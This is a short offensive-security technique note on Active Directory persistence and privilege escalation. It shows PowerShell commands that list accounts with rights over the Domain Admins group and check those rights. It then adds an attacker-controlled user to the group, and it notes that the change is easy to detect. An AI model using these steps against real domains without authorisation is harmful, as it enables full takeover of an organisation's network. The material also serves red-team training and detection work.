description = ‘Use permissions on Domain Admins to add users to the group’
This action requires to have rights over the Domain Admin group. Can be achieved by following my guide on modifying the AdminSDHoldercontainer. Alternatively, can be manually done.
Get all the users that have rights to make changes to the Domain Admins group.
(Get-Acl -Path <AD:<DN of the DomainAdminsGroup>).Access | select IdentityReference
If an interesting user, for example one that we control, is found, get its rights over the group.
(Get-Acl -Path <AD:<DN of the DomainAdminsGroup>).Access | ?{IdentityReference -match '<IdentityReference>'}
Add a user to the Domain Admins group.
Add-ADGroupMember -Identity <SamAccountName> <
-Members <SamAccountName>
Now the user is part of the Domain Admin group and can do almost every action on almost every object of the Active Directory. Of course, this technique is easily detectable just by looking at the members of the group.